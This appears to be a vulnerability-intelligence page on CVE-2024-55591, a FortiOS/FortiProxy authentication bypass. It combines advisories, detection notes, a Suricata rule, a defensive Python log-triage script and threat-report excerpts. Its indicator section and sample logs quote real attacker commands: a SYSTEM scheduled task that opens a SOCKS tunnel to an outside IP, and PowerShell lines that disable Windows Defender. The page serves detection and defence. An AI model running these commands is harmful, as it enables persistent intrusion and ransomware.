CVE-2024-55591
Published 2025-01-14
Priority: P1 (100) · Critical 9.8 · CVSS 3.1
Vector: AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Tags: KEV · ITW · Exploit · Ransomware · Initial access
CISA Known Exploited Vulnerability, remediation due 2025-01-21
Exploited in the wild
EPSS: 98.26% (99.9th percentile)
An Authentication Bypass Using an Alternate Path or Channel vulnerability [CWE-288] affecting FortiOS version 7.0.0 through 7.0.16 and FortiProxy version 7.0.0 through 7.0.19 and 7.2.0 through 7.2.12 allows a remote attacker to gain super-admin privileges via crafted requests to Node.js websocket module.
Affected (8 ranges)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| fortinet | fortios | — | — |
| fortinet | fortios | >= 7.0.0 < 7.0.17 | 7.0.17 |
| fortinet | fortios | 7.0.0 – 7.0.16 | — |
| fortinet | fortiproxy | — | — |
| fortinet | fortiproxy | >= 7.0.0 < 7.0.20 | 7.0.20 |
| fortinet | fortiproxy | 7.0.0 – 7.0.19 | — |
| fortinet | fortiproxy | >= 7.2.0 < 7.2.13 | 7.2.13 |
| fortinet | fortiproxy | 7.2.0 – 7.2.12 | — |
Detection & IOCs (extracted from sources)
Observed commands:
- `cmd.exe /C schtasks /create /tn WindowsConnSvc /tr C:\Windows\Temp\svchost32.exe client 77.110.122[.]137:37182 R:1085:socks /sc minute /mo 2 /ru SYSTEM /f > C:\Windows\Temp\RbHoNVNU.tmp 2>&1`
- `powershell.exe -Command Set-MpPreference -DisableRealtimeMonitoring $true; Stop-Service -Name WinDefend -Force; Set-Service -Name WinDefend -StartupType Disabled`
- `powershell -Command Add-MpPreference -ExclusionProcess C:\Users\[REDACTED]\downloads\G_hlm7jj_windows_amd64.exe -Force`
Detection notes:
- CVE-2024-55591 exploitation uses WebSocket-based attacks via the jsconsole interface or direct HTTPS requests to exposed firewall management interfaces to gain super_admin privileges.
- CVE-2024-55591 exploitation involves crafted requests to the Node.js websocket module; monitor the FortiOS/FortiProxy management interface for anomalous WebSocket connections.
- Post-exploitation: watch for creation of rogue local/admin accounts on FortiGate devices, especially accounts named forticloud-tech, fortigate-firewall, or adnimistrator (note the typo), and their addition to SSL VPN user groups.
- jsconsole usage was a common thread across CVE-2024-55591 exploitation intrusions; monitor FortiGate logs for jsconsole activity from unexpected source IPs.
- The CVE-2024-55591 mass-exploitation campaign followed four phases: vulnerability scanning (Nov 16–23), reconnaissance (Nov 22–27), SSL VPN configuration (Dec 4–7), and lateral movement (Dec 16–27, 2024).
- Detect The Gentlemen ransomware post-exploitation: look for a Scheduled Task named 'WindowsConnSvc' executing svchost32.exe from C:\Windows\Temp with SOCKS proxy arguments, running every 2 minutes as SYSTEM.
- Detect The Gentlemen ransomware: the ransom note filename README-GENTLEMEN.txt and the encrypted file extension .fjn1jw are unique indicators for file-based detection.
- Detect defense evasion: PowerShell commands disabling the WinDefend service and adding C:\ as an exclusion path are strong indicators of pre-ransomware activity.
- Monitor Windows Event Log clearing: Event ID 104 (Application/System logs cleared) and Event ID 1102 (Security log cleared) were observed in The Gentlemen attacks following CVE-2024-55591 exploitation.
- SuperBlack ransomware (Mora_001) post-exploitation: the attacker modifies firewall automation tasks to recreate rogue admin accounts if they are removed; monitor FortiGate automation task changes.
- SuperBlack ransomware deploys a wiper called WipeBlack after encryption to remove traces of the ransomware executable; the same wiper is also used by BrainCipher, EstateRansomware, and SenSayQ ransomware.
Advisory notes:
- CVE-2024-55591 affects FortiOS 7.0.0–7.0.16 and FortiProxy 7.0.0–7.0.19 and 7.2.0–7.2.12; patched in FortiOS 7.0.17+ and FortiProxy 7.0.20/7.2.13+. Customers who patched for CVE-2024-55591 are also protected against CVE-2025-24472.
- Fortinet confirmed CVE-2025-24472 was NOT exploited in the wild at the time of disclosure; only CVE-2024-55591 was confirmed exploited. Patching for CVE-2024-55591 covers both.
- If patching is not immediately possible, Fortinet advises disabling the HTTP/HTTPS administrative interface or restricting access via local-in policies to limit exposure to CVE-2024-55591.
- CVE-2024-55591 was exploited as a zero-day since at least mid-November 2024, before Fortinet's January 14, 2025 disclosure; organizations should assume potential compromise if management interfaces were internet-exposed during that window.
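A defender-side triage script for the indicators listed above, added here as an example; it is not code from the page or from any vendor cited on it. The simplified key=value log format, the sample lines, the IP addresses and the `TRUSTED_ADMIN_IPS` allow-list are constructed assumptions. The indicator values it matches on (the WindowsConnSvc task and svchost32.exe path, the three rogue account names, Event IDs 104/1102, the README-GENTLEMEN.txt note and .fjn1jw extension, and the Defender-tampering commands) are the ones from the detection notes.

```python
"""Triage of CVE-2024-55591 post-exploitation indicators over sample log lines.

Added example: not code from the page or from any vendor cited on it.
The simplified key=value log format, the sample lines, the IP addresses and the
TRUSTED_ADMIN_IPS allow-list are constructed assumptions; the indicator values
(task name, binary path, account names, event IDs, ransom note name, file
extension, Defender commands) are the ones listed in the detection notes.
"""
import re
from dataclasses import dataclass

# Indicator values taken from the detection notes on the page
ROGUE_ADMIN_NAMES = {"forticloud-tech", "fortigate-firewall", "adnimistrator"}
SUSPICIOUS_TASK_NAME = "windowsconnsvc"
SUSPICIOUS_BINARY = "c:\\windows\\temp\\svchost32.exe"
LOG_CLEAR_EVENT_IDS = {104, 1102}  # 104: App/System log cleared, 1102: Security log cleared
RANSOM_NOTE = "README-GENTLEMEN.txt"
RANSOM_EXT = ".fjn1jw"

# Assumption: management-interface source addresses expected to use jsconsole
TRUSTED_ADMIN_IPS = {"10.0.0.5"}

_KV_RE = re.compile(r'(\w+)=("[^"]*"|\S+)')


@dataclass
class Finding:
    rule: str
    line: str


def parse_kv(line: str) -> dict:
    """Parse the constructed key=value format; quoted values may contain spaces."""
    fields = {}
    for key, val in _KV_RE.findall(line):
        fields[key] = val[1:-1] if val.startswith('"') else val
    return fields


def check_fortigate(f: dict) -> list:
    """Rules for FortiGate system events: rogue admin creation and jsconsole use."""
    rules = []
    if f.get("cfgpath") == "system.admin" and f.get("action") == "Add":
        if f.get("cfgobj", "").lower() in ROGUE_ADMIN_NAMES:
            rules.append("rogue_admin_known_name")
        else:
            rules.append("admin_account_created")  # lower confidence, still worth review
    if f.get("ui", "").lower() == "jsconsole" and f.get("srcip") not in TRUSTED_ADMIN_IPS:
        rules.append("jsconsole_from_untrusted_ip")
    return rules


def check_windows(f: dict) -> list:
    """Rules for Windows host events: SOCKS task, Defender tampering, log clearing, ransom artifacts."""
    rules = []
    try:
        event_id = int(f.get("event_id", "0"))
    except ValueError:
        event_id = 0
    if event_id in LOG_CLEAR_EVENT_IDS:
        rules.append("event_log_cleared")
    cmd = f.get("cmdline", "").lower()
    if "schtasks" in cmd and "/create" in cmd and (
        "/tn " + SUSPICIOUS_TASK_NAME in cmd or (SUSPICIOUS_BINARY in cmd and "socks" in cmd)
    ):
        rules.append("windowsconnsvc_socks_task")
    if ("set-mppreference" in cmd and "-disablerealtimemonitoring" in cmd) or (
        "windefend" in cmd and ("stop-service" in cmd or "-startuptype disabled" in cmd)
    ):
        rules.append("defender_disabled")
    if "add-mppreference" in cmd and "-exclusion" in cmd:
        rules.append("defender_exclusion_added")
    path = f.get("path", "")
    if path.endswith(RANSOM_NOTE) or path.endswith(RANSOM_EXT):
        rules.append("gentlemen_ransomware_artifact")
    return rules


def triage(lines) -> list:
    """Run every line through the rule set for its source and collect findings."""
    findings = []
    for line in lines:
        f = parse_kv(line)
        checker = check_fortigate if f.get("src") == "fortigate" else check_windows
        findings.extend(Finding(rule, line) for rule in checker(f))
    return findings


# Constructed sample log lines (not real telemetry); RFC 5737 documentation addresses
SAMPLE_LOGS = [
    'src=fortigate type=event subtype=system ui=jsconsole srcip=198.51.100.23 '
    'action=Add cfgpath=system.admin cfgobj=forticloud-tech',
    'src=fortigate type=event subtype=system ui=GUI srcip=10.0.0.5 '
    'action=Edit cfgpath=firewall.policy cfgobj=12',
    'src=windows event_id=4688 cmdline="cmd.exe /C schtasks /create /tn WindowsConnSvc '
    '/tr C:\\Windows\\Temp\\svchost32.exe client 203.0.113.9:37182 R:1085:socks '
    '/sc minute /mo 2 /ru SYSTEM /f"',
    'src=windows event_id=4688 cmdline="powershell.exe -Command Set-MpPreference '
    '-DisableRealtimeMonitoring $true; Stop-Service -Name WinDefend -Force"',
    'src=windows event_id=1102 cmdline=""',
    'src=windows event_id=4688 cmdline="notepad.exe C:\\Users\\alice\\notes.txt"',
    'src=windows event_id=4663 path="C:\\Shares\\finance\\README-GENTLEMEN.txt"',
]

if __name__ == "__main__":
    for finding in triage(SAMPLE_LOGS):
        print(f"[{finding.rule}] {finding.line[:90]}")
```

Running it over the constructed sample prints six findings: the rogue account and the untrusted jsconsole source from the first FortiGate line, then the SOCKS scheduled task, the Defender disable, the cleared Security log and the ransom note; the benign GUI edit and the notepad process produce nothing. Each rule is matched case-insensitively on the command line rather than on the process image so that renamed interpreters still trip it.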
CVSS provenance
| Source | Version | Score | Severity | Vector |
|---|---|---|---|---|
| nvd | v3.1 | 9.8 | CRITICAL | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H |
| vulncheck | — | 9.8 | CRITICAL | — |
| cisa | — | 9.8 | CRITICAL | — |
GHSA
GHSA-v4mr-pqhx-vpm2: An Authentication Bypass Using an Alternate Path or Channel vulnerability [CWE-288] affecting FortiOS version 7
ghsa_unreviewed · 2025-01-14 · CVE-2024-55591 [CRITICAL] · CWE-288
An Authentication Bypass Using an Alternate Path or Channel vulnerability [CWE-288] affecting FortiOS version 7.0.0 through 7.0.16 and FortiProxy version 7.0.0 through 7.0.19 and 7.2.0 through 7.2.12 allows a remote attacker to gain super-admin privileges via crafted requests to Node.js websocket module.
VulnCheck
Fortinet FortiOS and FortiProxy Authentication Bypass Vulnerability
vulncheck · 2024 · CVE-2024-55591 [CRITICAL] · CWE-288 · CVSS 9.8
Fortinet FortiOS and FortiProxy contain an authentication bypass vulnerability that may allow an unauthenticated, remote attacker to gain super-admin privileges via crafted requests to Node.js websocket module.
Affected: Fortinet FortiOS and FortiProxy
Required Action: Apply mitigations per vendor instructions or discontinue use of the product if mitigations are unavailable.
Known Ransomware Campaign Use: Known
Exploitation References:
- https://arcticwolf.com/resources/blog/console-chaos-targets-fortinet-fortigate-firewalls/
- https://www.cisa.gov/sites/default/files/feeds/known_exploited_vulnerabilities.json
- https://www.rapid7.com/blog/post/2025/01/16/etr-fortinet-firewalls-hit-with-new-zero-day-attack-older-data-leak
Fortinet
FG-IR-24-535: Authentication bypass in Node.js websocket module and CSF requests
vendor_fortinet · 2025-01-14 · CVE-2024-55591 [CRITICAL] · CWE-288 · CVSS 9.8
An Authentication Bypass Using an Alternate Path or Channel vulnerability [CWE-288] affecting FortiOS version 7.0.0 through 7.0.16 and FortiProxy version 7.0.0 through 7.0.19 and 7.2.0 through 7.2.12 allows a remote attacker to gain super-admin privileges via crafted requests to Node.js websocket module.
An Authentication Bypass Using an Alternate Path or Channel vulnerability [CWE-288] affecting FortiOS 7.0.0 through 7.0.16 and FortiProxy 7.2.0 through 7.2.12, 7.0.0 through 7.0.19 may allow a remote unauthenticated attacker with prior knowledge of upstream and downstream devices serial numbers to gain super-admin privileges on the downstream device, if the Security Fabric is enabled, via crafted CSF proxy r
CISA
Fortinet FortiOS and FortiProxy Authentication Bypass Vulnerability
cisa · 2025-01-14 · CVE-2024-55591 [CRITICAL] · CWE-288 · CVSS 9.8
Affected: Fortinet FortiOS and FortiProxy
Fortinet FortiOS and FortiProxy contain an authentication bypass vulnerability that may allow an unauthenticated, remote attacker to gain super-admin privileges via crafted requests to Node.js websocket module.
Required Action: Apply mitigations per vendor instructions or discontinue use of the product if mitigations are unavailable.
Notes:
- https://fortiguard.fortinet.com/psirt/FG-IR-24-535
- https://nvd.nist.gov/vuln/detail/CVE-2024-55591
Remediation Due Date: 2025-01-21
Suricata
ET WEB_SPECIFIC_APPS Fortinet Authentication Bypass via Node.js Websocket (CVE-2024-55591)
suricata · 2025-01-16 · CVE-2024-55591 [CRITICAL] · CVSS 9.8
Rule:
```
alert http $EXTERNAL_NET any -> $HOME_NET any (msg:"ET WEB_SPECIFIC_APPS Fortinet Authentication Bypass via Node.js Websocket (CVE-2024-55591)"; flow:established,to_server; http.method; content:"GET"; http.uri; content:"/"; pcre:"/^\w+\-[a-zA-Z0-9]{6}$/R"; http.header; to_lowercase; content:"sec-websocket-key|3a 20|"; fast_pattern; content:"upgrade|3a 20|websocket"; content:!"origin|3a 20|http"; reference:url,github.com/watchtowrlabs/fortios-auth-bypass-check-CVE-2024-55591; reference:cve,2024-55591; classtype:web-application-attack; sid:2059283; rev:1; metadata:affected_product Fortigate, attack_target Server, tls_state TLSDecrypt, created_at 2025_01_16, cve CVE_2024_55591, deployment Perimet
```
Nuclei
Fortinet - Authentication Bypass
nuclei · CVE-2024-55591 [CRITICAL] · CVSS 9.8
Fortinet FortiOS is vulnerable to an information disclosure via service-worker.js that could allow an attacker to access sensitive information. This vulnerability affects FortiOS and could potentially lead to unauthorized access to the system.
Template:
```yaml
id: CVE-2024-55591

info:
  name: Fortinet - Authentication Bypass
  author: rootxharsh,iamnoooob,pdresearch
  severity: critical
  description: |
    Fortinet FortiOS is vulnerable to an information disclosure via service-worker.js that could allow an attacker to access sensitive information. This vulnerability affects FortiOS and could potentially lead to unauthorized access to the system.
  impact: |
    Unauthenticated attackers can bypass authentication mechanisms to access sensitive system information and gain unauthor
```
Hackernews
blogs_hackernews · 2026-06-11 · CVE-2024-55591
## The Gentlemen Ransomware Claims 478 Victims, Can Spread Like a Worm
A new analysis of The Gentlemen operation has revealed that the financially motivated threat group initially operated as an affiliate responsible for conducting double extortion attacks, while leveraging resources from various ransomware-as-a-service (RaaS) schemes like LockBit (aka Tenacious Mantis), Qilin (aka Pestilent Mantis), and Medusa (aka Venomous Mantis).
According to a detailed report published by PRODAFT, the group, which it tracks as Phantom Mantis, is led by a Russian-speaking cybercriminal it calls LARVA-368, who goes by the online aliases hast
Huntress
The Gentleman Ransomware | Defense Evasion TTPs Uncovered | Huntress
blogs_huntress · 2026-05-21 · CVE-2024-55591
Acknowledgments: Huntress wishes to recognize the contributions of SOC analysts Nick Roddy and Dani Lopez for their investigations and analysis into these incidents.
The Huntress SOC recently came across two incidents involving The Gentlemen ransomware, an operation that first emerged in mid-2025 and has been very active since then, with Ransomware.live showing claims of over 400 victims across at least 70 countries.
One intriguing aspect of previous The Gentlemen incidents is the defense evasion strategy used by threat actors that have deployed the ransomware. According to a Trend Micro report, threat actors have used custom-built defense evasion tools and capabilities to disable security solutions in The Gentlemen attacks. A more recent leak of the operation’s internal database, in ea
Checkpoint
blogs_checkpoint · 2026-05-13 · CVE-2024-55591 [CRITICAL] · CVSS 9.8
## Thus Spoke…The Gentlemen
## Key Points
On May 4th, 2026, The Gentlemen RaaS administrator acknowledged on underground forums that an internal backend database (Rocket) had been leaked.
Checkpoint
blogs_checkpoint · 2026-05-11 · CVE-2024-55591
## The State of Ransomware – Q1 2026
## Key Findings
Consolidation after peak fragmentation: The top 10 ransomware groups accounted for 71% of all Q1 2026 victims, a sharp reversal from the
Tenable
CVE-2026-35616: Fortinet FortiClientEMS improper access control vulnerability exploited in the wild
blogs_tenable · 2026-04-06 · [CRITICAL] · CVSS 9.8
Hackernews
blogs_hackernews · 2026-03-19 · [CRITICAL] · CVSS 9.8
## ThreatsDay Bulletin: FortiGate RaaS, Citrix Exploits, MCP Abuse, LiveChat Phish & More
ThreatsDay Bulletin is back on The Hacker News, and this week feels off in a familiar way. Nothing loud, nothing breaking everything at once. Just a lot of small things that shouldn’t work anymore but still do.
Some of it looks simple, almost sloppy, until you see how well it lands. Other bits feel a little too practical, like they’re already closer to real-world use than anyone wants to admit. And the background noise is getting louder again, the kind people usually ignore.
A few stories are clever in a bad way. Others are just frustrati
Mandiant
blogs_mandiant · 2026-03-16 · Google Threat Intelligence Group
## Ransomware Under Pressure: Tactics, Techniques, and Procedures in a Shifting Threat Landscape
Written by: Bavi Sadayappan, Zach Riddle, Ioana Teaca, Kimberly Goody, Genevieve Stark
## Introduction
Since 2018, when many financially motivated threat actors began shifting their monetization strategy to post-compromise ransomware deployments, ransomware has become one of the most pervasive threats to organizations across almost every industry vertical and region. In recent years ransomware operations have evolved, creating a robust ecosystem that has lowered the barrier to entry via the commoditization and specialization of the supporting underground communities, w
Mandiant
Ransomware Tactics, Techniques, and Procedures in a Shifting Threat Landscape
blogs_mandiant · 2026-03-16 · March 16, 2026
Greynoiseio
The Noise in the Silence: Unmasking CISA's Hidden KEV Ransomware Updates
blogs_greynoiseio · 2026-02-02
Tenable
CVE-2025-64155 PoC released Command Injection Vulnerability
blogs_tenable · 2026-01-14 · [CRITICAL] · CVSS 9.8
Tenable
CVE-2025-64446 FortiWeb Zero-Day Exploited
blogs_tenable · 2025-11-14 · [CRITICAL] · CVSS 9.8
Securelist
IT threat evolution in Q2 2025. Non-mobile statistics
blogs_securelist · 2025-09-05
Table of Contents
- The quarter in numbers
- Ransomware
- Quarterly trends and highlights
- Law enforcement success
- Vulnerabilities and attacks
- Mass exploitation of a vulnerability in SAP NetWeaver
- Attacks via the SimpleHelp remote administration tool
- Qilin exploits vulnerabilities in Fortinet
- Exploitation of a Windows CLFS vulnerability
- The most prolific groups
- Number of new variants
- Number of users attacked by ransomware Trojans
- Geography of attacked users
- TOP 10 countries and territories attacked by ransomware Trojans
- TOP 10 most common families of ransomware Trojans
- Miners
- Number of new variants
- Number of users attacked by miners
- Geography of attacked users
- TOP 10 countries and territories attacked by miners
- Attacks on macOS
- TOP 20 threats to macOS
- Geography of threats t
Securelist
Desktop and IoT threat report for Q2 2025
blogs_securelist · 2025-09-05
Table of Contents
- The quarter in numbers
- Ransomware
- Miners
- Attacks on macOS
- IoT threat statistics
- Attacks via web resources
- Local threats
Authors: AMR
Related reports:
- IT threat evolution in Q2 2025. Non-mobile statistics
- IT threat evolution in Q2 2025. Mobile statistics
The statistics in this report are based on detection verdicts returned by Kaspersky products unless otherwise stated. The information was provided by Kaspersky users who consented to sharing statistical data.
## The quarter in numbers
In Q2 2025:
- Kaspersky solutions blocked more than 471 million attacks originating from various online resources.
- Web Anti-Virus detected 77 million unique links.
- File Anti-Virus blocked nearly 23 million malicious and potentially unwanted objects.
- There were 1,702 new ransomwar
Bleepingcomputer
blogs_bleepingcomputer · 2025-08-26
## Nissan confirms design studio data breach claimed by Qilin ransomware
By Bill Toulas
Nissan Japan has confirmed to BleepingComputer that it suffered a data breach following unauthorized access to a server of one of its subsidiaries, Creative Box Inc. (CBI).
This came in response to the Qilin ransomware group's claims that they had stolen four terabytes of data from CBI, including 3D vehicle design models, internal reports, financial documents, VR design workflows, and photos.
"On August 16, 2025, suspicious access was detected on the data server of Creative Box Inc. (CBI), a company contracted by Nissan for design work," stated a Nissan spokesperson to BleepingComputer.
"CBI immediately implemented emergency measures, such as blocking all access to the server, to mitigate the risk,
Tenable
CVE-2025-25256: Proof of Concept Released for Critical Fortinet FortiSIEM Command Injection Vulnerability
blogs_tenable · 2025-08-13 · [CRITICAL] · CVSS 9.8
Bleepingcomputer
blogs_bleepingcomputer · 2025-08-05 · [CRITICAL] · CVSS 9.8
## The Heat Wasn't Just Outside: Cyber Attacks Spiked in Summer 2025
By Picus Security
Summer 2025 wasn't just hot; it was relentless.
Ransomware hammered hospitals, retail giants suffered data breaches, insurance firms were hit by phishing, and nation-state actors launched disruptive campaigns.
From stealthy PowerShell loaders to zero-day SharePoint exploits, attackers kept defenders on their heels.
This report breaks down the season's most high-impact incidents and what security teams need to do before the next wave hits.
## Summer Expose Healthcare's Growing Ransomware Risk
Hospitals can't afford downtime, and attackers know it.
This summer, ransomware groups targeted healthcare, exploiting both the value of patient data and the urgency of care.
## Interlock rises as a major th
Bleepingcomputer
blogs_bleepingcomputer · 2025-06-06 · [CRITICAL] · CVSS 9.8
## Critical Fortinet flaws now exploited in Qilin ransomware attacks
By Sergiu Gatlan
The Qilin ransomware operation has recently joined attacks exploiting two Fortinet vulnerabilities that allow bypassing authentication on vulnerable devices and executing malicious code remotely.
Qilin (also tracked as Phantom Mantis) surfaced in August 2022 as a Ransomware-as-a-Service (RaaS) operation under the "Agenda" name and has since claimed responsibility for over 310 victims on its dark web leak site.
Its victim list also includes high-profile organizations, such as automotive giant Yangfeng, publishing giant Lee Enterprises, Australia's Court Services Victoria, and pathology services provider Synnovis. The Synnovis incident impacted several major NHS hospitals in London, which forced the
Tenable
CVE-2025-32756: Zero-Day Vulnerability in Multiple Fortinet Products Exploited in the Wild
blogs_tenable · 2025-05-14 · [CRITICAL] · CVSS 9.8
Bleepingcomputer
blogs_bleepingcomputer · 2025-04-09 · CVE-2024-48887 [HIGH] · CVSS 7.5
## Critical FortiSwitch flaw lets hackers change admin passwords remotely
By Sergiu Gatlan
Fortinet has released security patches for a critical vulnerability in its FortiSwitch devices that can be exploited to change administrator passwords remotely.
The company says Daniel Rozeboom of the FortiSwitch web UI development team discovered the vulnerability (CVE-2024-48887) internally.
Unauthenticated attackers can exploit this unverified FortiSwitch GUI password change security flaw (rated with a 9.8/10 severity score) in low-complexity attacks that don't require user interaction.
Fortinet says threat actors can change credentials using a specially crafted request sent via the set_password endpoint.
"An unverified password change vulnerability [CWE-620] in FortiSwitch GUI may allow a
Bleepingcomputer
blogs_bleepingcomputer · 2025-03-13 · CVE-2024-55591 [CRITICAL] · CVSS 9.8
## New SuperBlack ransomware exploits Fortinet auth bypass flaws
By Bill Toulas
A new ransomware operator named 'Mora_001' is exploiting two Fortinet vulnerabilities to gain unauthorized access to firewall appliances and deploy a custom ransomware strain dubbed SuperBlack.
The two vulnerabilities, both authentication bypasses, are CVE-2024-55591 and CVE-2025-24472, which Fortinet disclosed in January and February, respectively.
When Fortinet first disclosed CVE-2024-55591 on January 14, they confirmed it had been exploited as a zero-day, with Arctic Wolf stating it had been used in attacks since November 2024 to breach FortiGate firewalls.
Confusingly, on February 11, Fortinet added CVE-2025-24472 to their January advisory, which led many to believe it was a newly exploited flaw. How
Bleepingcomputer
blogs_bleepingcomputer · 2025-02-11 · CVE-2025-24472 [CRITICAL] · CVSS 9.8
## Fortinet discloses second firewall auth bypass patched in January
By Sergiu Gatlan
Update 2/11/25 07:32 PM ET: After publishing our story, Fortinet has informed us that the new CVE-2025-24472 flaw added to FG-IR-24-535 today is not a zero-day and was already fixed in January.
Furthermore, even though today's updated advisory indicates that both flaws were exploited in attacks and even includes a workaround for the new CSF proxy requests exploitation pathway, Fortinet says that only CVE-2024-55591 was exploited.
Fortinet told BleepingComputer that if a customer previously upgraded based on the guidance in FG-IR-24-535 / CVE-2024-55591, then they are already protected against the newly disclosed vulnerability.
The title of our story has been updated to reflect this new information, a
Wiz
Crying Out Cloud Newsletter - February 2025 | Wiz
blogs_wiz · 2025-02-06
Welcome back! In this edition, we bring you the latest in cloud security – noteworthy incidents, exclusive data, and crucial vulnerabilities. Let's dive in.
Here are our top picks of cloud security highlights!
Hype or no hype – Codefinger Ransomware Campaign Targeting S3 Buckets
Codefinger is a ransomware campaign that exploits AWS Server-Side Encryption with Customer Provided Keys (SSE-C) to encrypt data in Amazon S3 buckets. While this campaign has sparked widespread concern, we argue that the panic is unwarranted. Many have focused on detecting unwanted SSE-C encryption as a mitigation strategy, but encryption is merely a tactic chosen by the attacker after gaining access—it is not the core issue. The real concern, which is neither new nor unique, is the use of compromised credential
Checkpoint
blogs_checkpoint · 2025-02-03 · CVE-2024-55591
## 3rd February – Threat Intelligence Report
For the latest discoveries in cyber research for the week of 3rd February, please download our Threat Intelligence Bulletin.
TOP ATTACKS AND BREACHES
Mizuno USA, giant sports equipment manufacturer, has confirmed a cyber-attack that resulted in the theft of personal information from its network between August and October 2024. The data breach included names, Social Security numbers, financial account information, driver’s license details, and passport numbers. The Bian
Tenable
CVE-2024-55591: Fortinet Authentication Bypass Zero-Day Vulnerability Exploited in the Wild
blogs_tenable·2025-01-14·CVSS 9.8
[CRITICAL] CVE-2024-55591: Fortinet Authentication Bypass Zero-Day Vulnerability Exploited in the Wild
Bleepingcomputer
Fortinet warns of auth bypass zero-day exploited to hijack firewalls
blogs_bleepingcomputer·2025-01-14·CVSS 9.8
CVE-2024-55591 [CRITICAL] Fortinet warns of auth bypass zero-day exploited to hijack firewalls
## Fortinet warns of auth bypass zero-day exploited to hijack firewalls
## Sergiu Gatlan
Attackers are exploiting a new authentication bypass zero-day vulnerability in FortiOS and FortiProxy to hijack Fortinet firewalls and breach enterprise networks.
This security flaw (tracked as CVE-2024-55591) impacts FortiOS 7.0.0 through 7.0.16, FortiProxy 7.0.0 through 7.0.19, and FortiProxy 7.2.0 through 7.2.12. Successful exploitation allows remote attackers to gain super-admin privileges by making malicious requests to the Node.js websocket module.
Fortinet says attackers exploiting the zero-day in the wild are creating randomly generated admin or local users on compromised devices and are adding them to existing SSL VPN user groups or to new ones they also add.
They've also been observed a
Greynoiseio
NoiseLetter March 2026
blogs_greynoiseio
Events, events… and yes, even more events. 🌍 GreyNoise has been on the move. March kept us busy with stops at eCrimes in London and SecIT in Hanover—but we’re just getting started. Over the next few months, we’ll be hitting the road for CrowdStrike CrowdTours across eight cities, heading to Glasgow to speak and sponsor CyberUK, and making our way to Tampa for H-ISAC. If you’ll be at any of these (or nearby), we’d love to connect.
And while we’ve been racking up miles, we haven’t slowed down on the research front. We’ve just released some exciting new findings—with even more coming in the next few weeks—so keep an eye out.
Thanks, as always, for being part of the GreyNoise community.
Featured
About this new report
Every enterprise firewall processes traffic from residential IP space. T
Threat Intel
Belsen Group
threat_intel·CVSS 9.8
CVE-2022-40684 [CRITICAL] Belsen Group
# Threat Actor: Belsen Group
## Description
The Belsen Group has exploited the CVE-2022-40684 vulnerability in Fortinet devices to compromise over 15,000 FortiGate firewalls, releasing detailed configurations and plaintext VPN credentials. Their leaked data, organized by country and IP address, primarily consists of configurations from FortiOS 7.0.6 and 7.2.1, which were the last vulnerable versions before patches were issued. Security researcher Kevin Beaumont confirmed that the group leveraged this vulnerability to gain unauthorized access and warned of potential exploitation of CVE-2024-55591 by similar threat actors. Fortinet has stated that the leaked data originates from older campaigns and not from any recent incidents.
Greynoiseio
NoiseLetter June 2025
blogs_greynoiseio
Threat Intel
Mora_001
threat_intel·CVSS 9.8
CVE-2024-55591 [CRITICAL] Mora_001
# Threat Actor: Mora_001
## Description
Mora_001 is a threat actor exhibiting a distinct operational signature that combines opportunistic attacks with ties to the LockBit ecosystem. The actor has been observed exploiting CVE-2024-55591 and CVE-2025-24472 vulnerabilities affecting Fortinet devices. The ransom note associated with Mora_001 includes the same TOX ID used by LockBit, indicating a potential affiliation or shared communication channels. Their post-exploitation patterns suggest a structured playbook that differentiates them from other ransomware operators, including LockBit affiliates.
ATT&CK
Network Device Firewall
mitre_attack·CVSS 9.8
CVE-2024-55591 [CRITICAL] Network Device Firewall
Network Device Firewall
Adversaries may disable network device-based firewall mechanisms entirely or add, delete, or modify particular rules in order to bypass controls limiting network usage.
Adversaries may obtain access to devices such as routers, switches, or other perimeter/network devices and change access control lists (ACLs), security zones, or policy rules to permit otherwise blocked traffic. For example, adversaries may add new network firewall rules to allow access to all internal network subnets without restrictions. Allowing access to internal network subsets may enable unrestricted inbound/outbound connectivity or open paths for command and control and lateral movement.
Adversaries may obtain access to network device management interfaces via [Valid Accounts](https://attac
ATT&CK
Disable or Modify Network Device Firewall
mitre_attack·CVSS 9.8
[CRITICAL] Disable or Modify Network Device Firewall
Disable or Modify Network Device Firewall
Adversaries may disable network device-based firewall mechanisms entirely or add, delete, or modify particular rules in order to bypass controls limiting network usage.
Modifying or disabling a network firewall may enable adversary C2 communications, lateral movement, and/or data exfiltration that would otherwise not be allowed. For example, adversaries may add new network firewall rules to allow access to all internal network subnets without restrictions.(Citation: Exposed Fortinet Fortigate firewall interface leads to LockBit Ransomware)
Adversaries may gain access to the firewall management console via [Valid Accounts](https://attack.mitre.org/techniques/T1078) or by exploiting a vulnerability. In some cases, threat actors may target firewall
2025-01-14
Published
2025-01-14
Added to CISA KEV
Exploited in the wild